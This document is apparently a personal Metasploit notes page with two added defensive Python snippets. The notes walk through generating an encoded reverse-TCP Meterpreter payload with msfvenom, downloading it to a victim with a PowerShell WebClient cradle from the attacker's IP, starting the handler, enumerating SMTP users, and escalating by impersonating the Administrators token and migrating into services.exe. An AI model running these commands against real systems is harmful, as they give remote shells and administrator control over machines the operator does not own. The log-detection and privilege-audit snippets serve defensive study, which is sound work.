Metasploit

Metasploit is a powerful penetration testing and hacking framework designed to help secure networks, services, and applications by identifying and exploiting vulnerabilities.

Metasploit can be used in countless ways. These are just a few things I found interesting and helpful along the way.

Upgrade PowerShell to Meterpreter

If you are able to land a standard PowerShell connection from the victim machine, you can upgrade the shell to a Meterpreter shell.

This msfvenom command generates a reverse TCP Meterpreter payload for 32-bit (x86) Windows, encoded with shikata_ga_nai and written out as an executable.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.57.139 LPORT=1224 -f exe -o upgradeShell.exe

After creating this payload, download it to the machine using the same method in the previous step:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.57.139:80/upgradeShell.exe','upgradeShell.exe')"

Before running this program, ensure the handler is set up in Metasploit:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.6.57.139
set LPORT 1224
run

Once the handler is running, enter this command on the victim machine to start the reverse shell:

Start-Process "upgradeShell.exe"
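Added example (not from the original notes): the download-and-run steps above leave a recognisable trace in PowerShell script block logging, and this Python snippet shows a detection over a few constructed log entries. It flags the download cradle on its own and raises the severity when the fetched file is later started on the same host. The event layout, host names, and the analyse function are my assumptions for the example, not a Windows or Metasploit API.

```python
import re
from dataclasses import dataclass

# Constructed PowerShell ScriptBlock-logging entries (the script text that
# Event ID 4104 carries). The IP and filename echo the notes above.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "host": "WS01",
     "script": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
    {"time": "2024-01-01T10:01:10", "host": "WS01",
     "script": "(New-Object System.Net.WebClient).DownloadFile("
               "'http://10.6.57.139:80/upgradeShell.exe','upgradeShell.exe')"},
    {"time": "2024-01-01T10:01:35", "host": "WS01",
     "script": 'Start-Process "upgradeShell.exe"'},
    {"time": "2024-01-01T10:05:00", "host": "WS02",
     "script": "Invoke-WebRequest -Uri https://updates.example.test/agent.msi "
               "-OutFile agent.msi"},
]

# Download cradles: WebClient.DownloadFile(url, dest) and Invoke-WebRequest -OutFile.
CRADLE_PATTERNS = [
    re.compile(r"""\.DownloadFile\(\s*['"](?P<url>[^'"]+)['"]\s*,\s*['"](?P<dest>[^'"]+)['"]""", re.I),
    re.compile(r"""Invoke-WebRequest\b.*?-Uri\s+['"]?(?P<url>\S+?)['"]?\s.*?-OutFile\s+['"]?(?P<dest>[^'"\s]+)""", re.I),
]
# Execution of a file by name: Start-Process "x.exe" or Start-Process -FilePath x.exe.
EXEC_PATTERN = re.compile(r"""Start-Process\s+(?:-FilePath\s+)?['"]?(?P<exe>[^'"\s]+)""", re.I)


@dataclass
class Finding:
    host: str
    time: str
    kind: str    # "download_cradle" or "download_and_execute"
    detail: str


def _basename(path: str) -> str:
    """Normalise a Windows or URL-style path to its lowercase file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse(events: list) -> list:
    """Walk events in time order, remember what each host downloaded, and
    escalate when a downloaded file is later started on that host."""
    findings = []
    fetched = {}  # (host, basename) -> url the file was fetched from
    for ev in sorted(events, key=lambda e: e["time"]):
        script = ev["script"]
        for rx in CRADLE_PATTERNS:
            m = rx.search(script)
            if m:
                name = _basename(m.group("dest"))
                fetched[(ev["host"], name)] = m.group("url")
                findings.append(Finding(ev["host"], ev["time"], "download_cradle",
                                        f"{m.group('url')} -> {name}"))
        m = EXEC_PATTERN.search(script)
        if m:
            name = _basename(m.group("exe"))
            url = fetched.get((ev["host"], name))
            if url is not None:
                findings.append(Finding(ev["host"], ev["time"], "download_and_execute",
                                        f"{name} fetched from {url} and then started"))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.time} {f.host} {f.kind}: {f.detail}")
```

The lone cradle on WS02 is still reported because a download by itself is only a weak signal; in practice you would allowlist known update sources and keep the download-then-execute correlation as the high-confidence alert.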

SMTP

Simple Mail Transfer protocol

Poorly configured or vulnerable mail servers can often provide an initial foothold into a network, but prior to launching an attack, we want to fingerprint the server to make our targeting as precise as possible. We're going to use the "smtp_version" module in Metasploit to do this. As its name implies, it will scan a range of IP addresses and determine the version of any mail servers it encounters.

Search "smtp_version"

  • auxiliary/scanner/smtp/smtp_version
  • Set RHOSTS
  • Exploit

Search "smtp_enum"

  • auxiliary/scanner/smtp/smtp_enum
  • Set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
  • Set RHOSTS
  • Exploit

Windows Escalation Technique

SeDebugPrivilege / SeImpersonatePrivilege

If both of these privileges (SeDebugPrivilege and SeImpersonatePrivilege) are enabled, we can use the incognito module in Metasploit to exploit this.

use incognito

You may need to use the load incognito command instead if the previous command doesn't work.

Check which tokens are available:

list_tokens -g

Use this command to impersonate the Administrators token if it is listed:

impersonate_token "BUILTIN\Administrators"

Even though you now hold a higher-privileged token, you may not have the permissions of a privileged user. This is due to the way Windows handles permissions: it uses the primary token of the process, not the impersonated token, to determine what the process can or cannot do.

The safest process to pick is services.exe. First, use the ps command to list processes and find the PID of services.exe.

Migrate to that process using the command:

migrate PID-OF-PROCESS
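Added example (not from the original notes): the section above assumes you already know whether SeDebugPrivilege and SeImpersonatePrivilege are enabled. This Python snippet parses the output of the Windows whoami /priv command and reports the state of those two privileges, which is the same check a defender runs when auditing which service accounts hold them. The sample output is constructed, and the parse_privileges and check_token_privileges functions are my own names for the example.

```python
from dataclasses import dataclass

# Constructed sample in the layout that `whoami /priv` prints on Windows.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeDebugPrivilege              Debug programs                            Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# The two privileges the notes above rely on.
REQUIRED = ("SeDebugPrivilege", "SeImpersonatePrivilege")


def parse_privileges(text: str) -> dict:
    """Return {privilege name: state}. Each data row starts with the
    Se...Privilege name and ends with the state word; the description in
    between contains spaces, so only the first and last fields are used."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("Se") and parts[0].endswith("Privilege"):
            privs[parts[0]] = parts[-1]
    return privs


@dataclass
class TokenCheck:
    present: dict      # name -> "Enabled", "Disabled" or "Absent" for REQUIRED
    enabled: list      # the REQUIRED privileges that are currently enabled
    all_enabled: bool  # the condition stated in the notes above


def check_token_privileges(text: str) -> TokenCheck:
    """Evaluate the notes' precondition against whoami /priv output.
    Note for auditors: a privilege shown as Disabled is still held by the
    token and can be switched on by the process, so only Absent means the
    account does not have it at all."""
    privs = parse_privileges(text)
    present = {name: privs.get(name, "Absent") for name in REQUIRED}
    enabled = [name for name, state in present.items() if state == "Enabled"]
    return TokenCheck(present, enabled, len(enabled) == len(REQUIRED))


if __name__ == "__main__":
    result = check_token_privileges(SAMPLE_WHOAMI_PRIV)
    for name, state in result.present.items():
        print(f"{name}: {state}")
    print("both enabled:", result.all_enabled)
```

Run it against real output by piping whoami /priv into a file and passing the file's text to check_token_privileges; on the constructed sample it reports SeImpersonatePrivilege enabled and SeDebugPrivilege held but disabled, so the "both enabled" condition from the notes is not met.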
